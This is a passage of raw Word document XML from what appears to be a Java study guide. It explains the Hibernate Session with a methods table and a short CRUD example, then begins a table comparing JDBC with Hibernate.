    <w:p w14:paraId="0B851E02" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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rovided by the SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDCEB27" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Used to perform CRUD operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235E208" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Not thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CFC7D" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-level cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF0800" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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ifecycle is short-lived (per transaction or request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742B180" w14:textId="77777777" w:rsidR="00726D4F"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0D21517">
          <v:rect id="_x0000_i2418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A082F8" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Common Methods in Sess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8"/>
        <w:gridCol w:w="4598"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="033AA9CA" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CCD4D85" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B23B098" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2B6242D0" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C905371" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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ave(Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DE0492" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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nserts new entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="00764402" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73A9DD02" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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get(Class, id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56907F73" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Fetches entity, returns null if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C4170F9" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541BC369" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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oad(Class, id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4824864F" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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azily fetches entity, throws exception if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2462F62E" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3597C5FE" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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update(Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A936A55" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Updates existing entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="06A809B9" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="038AF824" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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delete(Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="055E1DC0" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Deletes entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="10CFEB16" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7789AFCE" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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reateQuery()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782A7B7A" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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xecutes HQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="39DA2973" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137A76E6" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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beginTransaction()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C30091B" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Begins transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="22CEBD9A" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0174F60D" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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lastRenderedPageBreak/>
              <w:t>close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0FF8F5" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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loses the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="704C7FDB" w14:textId="77777777" w:rsidR="00726D4F"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67FB8E6">
          <v:rect id="_x0000_i2419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1D644" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15C326" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC577B" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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ransaction tx = session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4D8E2" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E612FB8" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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mployee emp = session.get(Employee.class, 1);  // Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170629C" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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mp.setName("Updated Name");                   // Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83E06E" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514582B3" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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x.commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3E358" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A258A65" w14:textId="77777777" w:rsidR="00726D4F"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CE5031B">
          <v:rect id="_x0000_i2420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B4665" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Session Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608545A" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Open</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: From SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898DB5B" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Use</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Perform CRUD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B242A05" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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lose</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Must always close session to release resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CD450" w14:textId="77777777" w:rsidR="00726D4F"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8B506F3">
          <v:rect id="_x0000_i2421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19DA60" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Types of Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB827F" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1979"/>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Stateless Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn’t cache or track entity changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A1203" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1979"/>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Stateful Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default, maintains cache, tracks changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01C8B2" w14:textId="77777777" w:rsidR="00726D4F"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3D87C3C">
          <v:rect id="_x0000_i2422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D12B5" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56436C84" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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A Hibernate Session is a lightweight, non-thread-safe object that handles database operations and maintains a first-level cache for the duration of a transaction. It should be short-lived and always closed after use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC695E" w14:textId="495EA5DE" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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4234D71">
          <v:rect id="_x0000_i2423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE90BD" w14:textId="17AD25E9" w:rsidR="00C12794" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12794">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="_Toc196308027"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between JDBC and Hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
    </w:p>
    <w:p w14:paraId="348FFACE" w14:textId="78C27A0F" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference Between JDBC and Hibernat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20"/>
        <w:gridCol w:w="3281"/>
        <w:gridCol w:w="4603"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5CDD6FAB" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12958D27" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E54BC41" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A"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JDBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C6CE19" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A"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Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3E853B0F" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3611E41D"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Abstraction Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67690313"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ow-level API, manual SQL handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A7E83D"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High-level ORM framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="4291A0D3" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1837928E"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SQL Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26FE1ED7"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Developer writes SQL manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF1DBFE"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QL is auto-generated using HQL/Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="273D0C25" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D39ABD"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Object Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE42791"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No object-relational mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ACEB686"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Maps Java objects to DB tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6330D582" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C07BCA2"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Transaction Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FDC80D8"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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4947D12F"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Automatic or declarative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="200D3673" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637BC978"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aching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EECFA5B"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No caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="044D2EE8"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upports first and second level caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="62A14EE2" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EEAE26"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Performance Optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209BAF83"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Manual tuning required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA907EA"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Built-in optimizations like lazy loading, caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="257A5BFB" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="615C1AC0"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Database Independence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="257B321C"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ight coupling; DB-specific SQL required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
